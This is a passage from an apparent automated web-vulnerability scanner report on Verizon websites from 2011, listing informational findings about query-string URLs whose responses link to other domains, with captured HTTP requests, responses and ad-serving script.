LiSESSIONID=96AD1A580BC805EF6D16752DEF4B5C57; WT_FPC=id=26270d900e95bd3ea5f1315276980084:lv=1315276980084:ss=1315276980084; CP=null*

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:43:14 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 1049
Connection: close
Content-Type: text/html;charset=UTF-8

<div id="litho_user_hoverbox">
   <div class="litho_userInfo_top">
       <div id="litho_user_name">CindyB</div>

           <div ><img src="http://vrzn.i.lithium.com/t5/image/serverpage/avatar-name/environment-clouds/avatar-theme/legacyclassic/avatar-collection/environment/avatar-display-size/message" alt="User Icon" /></div>
...[SNIP]...

15.19. http://media.verizon.com/media/scripts/widget.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.verizon.com
Path:	/media/scripts/widget.ashx

Issue detail

The page was loaded from a URL containing a query string:

http://media.verizon.com/media/scripts/widget.ashx?widget=vzNews&container=vzNewsWidget

The response contains the following link to another domain:

http://www.adobe.com/go/getflash/

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 143025
Date: Mon, 05 Sep 2011 22:41:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:23 GMT; path=/media

/* widget.ashx code generated : 9/5/2011 10:41:23 PM; valid until: 9/5/2011 5:42:21 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = false;

/* files consolidated
...[SNIP]...
</div>' +
' <a href="http://www.adobe.com/go/getflash/" target="_blank" style="text-decoration:none; color:#000; font-weight: bold;"><div>
...[SNIP]...

15.20. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.verizononline.com
Path:	/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13?search=

The response contains the following links to other domains:

http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_SMB_300x100_2010-03/300x100_superpages.jpg/1268256714
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/house_300x250_smb_intuit/adbanner_intuit_300x250.gif/1299008084

Request

GET /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13?search= HTTP/1.1
Host: oascentral.verizononline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1001
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Top1') {
document.write ('<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/business2.vz.net/out/homepage/L29/1781583294/Top1/VDSL/house_300x250_smb_intuit/intuit_wireless_smb_300x250.html/4d686437616b356c5473304142582f54" target="_blank"> \n');
document.write ('<img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/house_300x250_smb_intuit/adbanner_intuit_300x250.gif/1299008084" border="0" \n');
document.write ('width="300" height="250" alt=""/></a>
...[SNIP]...
ntral.verizononline.com/RealMedia/ads/click_lx.ads/business2.vz.net/out/homepage/L29/1318839174/x13/VDSL/House_SMB_300x100_2010-03/300x100_superpages.jpg/4d686437616b356c5473304142582f54?x" target=" "><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_SMB_300x100_2010-03/300x100_superpages.jpg/1268256714" ALT="" BORDER="0"></A>
...[SNIP]...

15.21. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.verizononline.com
Path:	/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13?popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=

The response contains the following links to other domains:

http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_SMB_300x100_2010-03/zCloud_sept2010.gif/1285012947
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/house_300x250_smb_intuit/adbanner_intuit_300x250.gif/1299008084

Request

GET /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13?popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life
Cookie: OAX=Mhd7ak5lTs4AAhpq; NSC_d17efm_qppm_iuuq=ffffffff09499e3c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1090
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Top1') {
document.write ('<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/business2.vz.net/out/news/L25/1322801724/Top1/VDSL/house_300x250_smb_intuit/intuit_wireless_smb_300x250.html/4d686437616b356c5473344141687071" target="_blank"> \n');
document.write ('<img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/house_300x250_smb_intuit/adbanner_intuit_300x250.gif/1299008084" border="0" \n');
document.write ('width="300" height="250" alt=""/></a>
...[SNIP]...
/RealMedia/ads/click_lx.ads/business2.vz.net/out/news/L25/99503660/x13/VDSL/House_SMB_300x100_2010-03/zcloud_smb_sept2010.html/4d686437616b356c5473344141687071" target="_blank"> \n');
document.write ('<img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_SMB_300x100_2010-03/zCloud_sept2010.gif/1285012947" border="0" \n');
document.write ('width="300" height="100" alt=""/></a>
...[SNIP]...

15.22. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.verizononline.com
Path:	/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1?search=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N2870.vznbiz/B3160296;abr=!ie4;abr=!ie5;sz=300x300;ord=571859577?
http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296;sz=300x300;ord=571859577?
http://ad.doubleclick.net/adj/N2870.vznbiz/B3160296;abr=!ie;sz=300x300;ord=571859577?

Request

GET /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1?search= HTTP/1.1
Host: oascentral.verizononline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1359
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Top1') {
document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296;sz=300x300;ord=571859577?" WIDTH=300 HEIGHT=300 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2870.vznbiz/B3160296;abr=!ie;sz=300x300;ord=571859577?">\n');
document.write ('</SCRIPT>
...[SNIP]...
_2008-10/Orbitz_NAF_biz.net_TrvBE_2008-10.html/4d686437616b356c5473344141687071?http://ad.doubleclick.net/jump/N2870.vznbiz/B3160296;abr=!ie4;abr=!ie5;sz=300x300;ord=571859577?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N2870.vznbiz/B3160296;abr=!ie4;abr=!ie5;sz=300x300;ord=571859577?" BORDER=0 WIDTH=300 HEIGHT=300 ALT="Click Here"></A>
...[SNIP]...

15.23. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.verizononline.com
Path:	/RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight?search=

The response contains the following links to other domains:

http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_Perks_2011-07/50791_300x100.jpg/1310155675
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_RoomtoLearn_2011-03/RTL_3DTV_300x100_v4_31711.jpg/1301320906
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_SBCPromo_2011-02/sbc_banner_300x100_made_easier.jpg/1298398283
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x250_STN_2011-08/300x250RewardsforReferrals.jpg/1313608230

Request

GET /RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight?search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5lS3YAAoHO; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:41:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2555
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('\n');
document.write (' <a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/my.verizon.com/homepage/newuser/L31/307160572/Bottom/VDSL/House_300x100_SBCPromo_2011-02/House_300x100_SBC-MadeEasier_2011-02.html/4d686437616b356c53335941416f484f" target="_blank">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_SBCPromo_2011-02/sbc_banner_300x100_made_easier.jpg/1298398283" style="border:0px black solid;" width="300" height="100" alt="" />\n');
document.write ('</a>
...[SNIP]...
com/homepage/newuser/L31/461590858/Bottom1/VDSL/House_300x100_RoomtoLearn_2011-03/House_300x100_RoomtoLearn_3DTV_2011-03.html/4d686437616b356c53335941416f484f" target="_top">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_RoomtoLearn_2011-03/RTL_3DTV_300x100_v4_31711.jpg/1301320906" style="border:0px black solid;" width="300" height="100" alt="" />\n');
document.write ('</a>
...[SNIP]...
my.verizon.com/homepage/newuser/L31/533474869/BottomRight/VDSL/House_300x100_Perks_2011-07/House_300x100_Perks_2011-07.html/4d686437616b356c53335941416f484f" target="_blank">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_Perks_2011-07/50791_300x100.jpg/1310155675" style="border:0px black solid;" width="300" height="100" alt="" />\n');
document.write ('</a>
...[SNIP]...
.ads/my.verizon.com/homepage/newuser/L31/1308990206/Top1/VDSL/House_300x250_STN_2011-08/300x250RewardsforReferrals.jpg.html/4d686437616b356c53335941416f484f" target="_blank">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x250_STN_2011-08/300x250RewardsforReferrals.jpg/1313608230" style="border:0px black solid;" width="300" height="250" alt="" />\n');
document.write ('</a>
...[SNIP]...

15.24. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.verizononline.com
Path:	/RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1?search=

The response contains the following links to other domains:

http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_PaperFree_2011-06/pfb_sweeps_180x150.jpg/1308073583
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_SBCPromo_2011-02/sbc_banner_180x150_build.jpg/1298398048

Request

GET /RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1?search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:21:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1251
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right') {
document.write (' <a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/shopvz.net/homepage/L19/1930716668/Right/VDSL/House_180x150_PaperFree_2011-06/House_180x150_PaperFree2_2011-06.html/4d686437616b356c53335941416f484f" target="_top">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_PaperFree_2011-06/pfb_sweeps_180x150.jpg/1308073583" style="border:0px black solid;" width="180" height="150" alt="" />\n');
document.write ('</a>
...[SNIP]...
ck_lx.ads/shopvz.net/homepage/L19/617420134/Right1/VDSL/House_180x150_SBCPromo_2011-02/House_180x150_SBC-Build_2011-02.html/4d686437616b356c53335941416f484f" target="_blank">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_SBCPromo_2011-02/sbc_banner_180x150_build.jpg/1298398048" style="border:0px black solid;" width="180" height="150" alt="" />\n');
document.write ('</a>
...[SNIP]...

15.25. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.verizononline.com
Path:	/RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1?search=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=<[token=
http://ad.doubleclick.net/jump/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=<[token=
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/Experian_NAF_vzc_FS_302_2009-07/freecredit_green_302x7242924205.gif/1287531523
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_RoomtoLearn_2011-03/RTL_kidproof_180x150_v2_31711.jpg/1301322390
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/Orbitz_NAF_vznews_302_2008-02/302x72_orbitz2.gif/1209134446
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/eBay_NAF_vznews_302_2009-10/ad_ebay.gif/1254758783
http://imagec17.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0

Request

GET /RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1?search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5lS3YAAoHO; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4473
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write (' <a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/L28/1285194082/Right1/VDSL/House_180x150_RoomtoLearn_2011-03/House_180x150_RoomtoLearn_kidproof_2011-03.html/4d686437616b356c53335941416f484f" target="_top">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_RoomtoLearn_2011-03/RTL_kidproof_180x150_v2_31711.jpg/1301322390" style="border:0px black solid;" width="180" height="150" alt="" />\n');
document.write ('</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=<[token="dynamic" handler="sv" key="postal_code"]>;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=<[token="dynamic" handler="sv" key="postal_code"]>;ord=123456789?" border="0" alt="" />
...[SNIP]...
<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/1689080054/x38/default/empty.gif/4d686437616b356c53335941416f484f?x" target="_top"><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
//oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/L28/1287766493/x48/VDSL/eBay_NAF_vznews_302_2009-10/ad_ebay.gif/4d686437616b356c53335941416f484f?x" target="_top"><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/eBay_NAF_vznews_302_2009-10/ad_ebay.gif/1254758783" ALT="" BORDER="0"></A>
...[SNIP]...
tral.verizononline.com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/L28/624913022/x49/VDSL/Orbitz_NAF_vznews_302_2008-02/302x72_orbitz2.gif/4d686437616b356c53335941416f484f?x" target="_new"><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/Orbitz_NAF_vznews_302_2008-02/302x72_orbitz2.gif/1209134446" ALT="" BORDER="0"></A>
...[SNIP]...
com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/L28/418353767/x50/VDSL/Experian_NAF_vzc_FS_302_2009-07/freecredit_green_302x7242924205.gif/4d686437616b356c53335941416f484f?x" target="_new"><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/Experian_NAF_vzc_FS_302_2009-07/freecredit_green_302x7242924205.gif/1287531523" ALT="" BORDER="0"></A>
...[SNIP]...

15.26. http://s7.addthis.com/js/250/addthis_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s7.addthis.com
Path:	/js/250/addthis_widget.js

Issue detail

The page was loaded from a URL containing a query string:

http://s7.addthis.com/js/250/addthis_widget.js?username=rgadevtest

The response contains the following links to other domains:

http://www.hyves.nl/respect/button?url={{URL}}
http://www.stumbleupon.com/badge/embed/{{STYLE}}/?url={{URL}}

Request

GET /js/250/addthis_widget.js?username=rgadevtest HTTP/1.1
Host: s7.addthis.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,12|36

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 25 Aug 2011 11:55:33 GMT
ETag: "f80f13-11f96-4ab531b26b740"
Accept-Ranges: bytes
Content-Length: 73622
Content-Type: application/x-javascript
Date: Mon, 05 Sep 2011 22:16:23 GMT
Connection: close
Vary: Accept-Encoding

/* (c) 2008, 2009, 2010 Add This, LLC */
if(!window._ate){var _atd="www.addthis.com/",_atr="//s7.addthis.com/",_atn="//l.addthiscdn.com/",_euc=encodeURIComponent,_duc=decodeURIComponent,_atc={dr:0,ver
...[SNIP]...
yle||"1",aZ=aG.share.url=ai.href||_ate.track.mgu(aG.share.url,{defrag:1}),a6=ai.height||"20px",au=ai.width||"75px";if(aa=="5"){a6=ai.height||"60px"}else{if(aa=="6"){a6=ai.height||"31px"}}aI.innerHTML='<iframe src="//www.stumbleupon.com/badge/embed/{{STYLE}}/?url={{URL}}" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:{{WIDTH}}; height:{{HEIGHT}};" allowtransparency="true"></iframe>
...[SNIP]...
",a6).replace("{{WIDTH}}",au);aI.noh=aI.ost=1}else{if(a1.indexOf("hyves_respect")>-1){var a9=h(aI,"hy:respect"),ae=aG.share.url=a9.url||_ate.track.mgu(aG.share.url,{defrag:1}),aS=a9.width||"140px",aJ='<iframe src="//www.hyves.nl/respect/button?url={{URL}}" style="border: medium none; overflow:hidden; width:{{WIDTH}}; height:22px;" scrolling="no" frameborder="0" allowTransparency="true" ></iframe>
...[SNIP]...

15.27. http://search.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://search.verizon.com/?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q

The response contains the following links to other domains:

http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css
http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js
http://content.atomz.com/pb00002f7b/publish/includes/js/search.js
http://content.atomz.com/pb00002f7b/publish/includes/js/tip_balloon.js
http://content.atomz.com/pb00002f7b/publish/includes/js/wz_tooltip.js
http://content.atomz.com/pb000035a2/publish/includes/css/default.css
http://securityblog.verizonbusiness.com/
http://www.verizonbusiness.com/
http://www.verizonbusiness.com/(none18:52:08)/templates/vzbar/site.js
http://www.verizonbusiness.com/(none20:54:40)/templates/vzbcann/site.js
http://www.verizonbusiness.com/about/
http://www.verizonbusiness.com/about/company/
http://www.verizonbusiness.com/about/company/executives/
http://www.verizonbusiness.com/about/company/history/
http://www.verizonbusiness.com/about/environment/
http://www.verizonbusiness.com/about/events/
http://www.verizonbusiness.com/about/ipinnovation/
http://www.verizonbusiness.com/about/network/
http://www.verizonbusiness.com/about/news/
http://www.verizonbusiness.com/about/news/fast/
http://www.verizonbusiness.com/about/news/globalarchive/
http://www.verizonbusiness.com/about/news/media/
http://www.verizonbusiness.com/about/news/network/
http://www.verizonbusiness.com/about/news/podcasts/
http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud-Based+Managed+Data+Protection+Solution.xml
http://www.verizonbusiness.com/about/news/presskits/
http://www.verizonbusiness.com/about/products/
http://www.verizonbusiness.com/ar/
http://www.verizonbusiness.com/at/
http://www.verizonbusiness.com/au/
http://www.verizonbusiness.com/be/
http://www.verizonbusiness.com/br/
http://www.verizonbusiness.com/ca/
http://www.verizonbusiness.com/ch/
http://www.verizonbusiness.com/cl/
http://www.verizonbusiness.com/cn/
http://www.verizonbusiness.com/co/
http://www.verizonbusiness.com/countries/
http://www.verizonbusiness.com/de/
http://www.verizonbusiness.com/de/solutions/var/
http://www.verizonbusiness.com/dk/
http://www.verizonbusiness.com/es/
http://www.verizonbusiness.com/fi/
http://www.verizonbusiness.com/fr/
http://www.verizonbusiness.com/hk/
http://www.verizonbusiness.com/ie/
http://www.verizonbusiness.com/in/
http://www.verizonbusiness.com/info/thinkforward/
http://www.verizonbusiness.com/it/
http://www.verizonbusiness.com/it/solutions/var/
http://www.verizonbusiness.com/jp/
http://www.verizonbusiness.com/kr/
http://www.verizonbusiness.com/mx/
http://www.verizonbusiness.com/nl/
http://www.verizonbusiness.com/nl/solutions/var/
http://www.verizonbusiness.com/no/
http://www.verizonbusiness.com/nz/
http://www.verizonbusiness.com/pa/
http://www.verizonbusiness.com/products/
http://www.verizonbusiness.com/products/conferencing/
http://www.verizonbusiness.com/products/conferencing/audio/
http://www.verizonbusiness.com/products/conferencing/calculator/
http://www.verizonbusiness.com/products/conferencing/video/
http://www.verizonbusiness.com/products/conferencing/web/
http://www.verizonbusiness.com/products/contactcenter/
http://www.verizonbusiness.com/products/contactcenter/acd/
http://www.verizonbusiness.com/products/contactcenter/intelligent/
http://www.verizonbusiness.com/products/contactcenter/ip/
http://www.verizonbusiness.com/products/contactcenter/profsvcs/
http://www.verizonbusiness.com/products/contactcenter/quality/
http://www.verizonbusiness.com/products/contactcenter/speech/
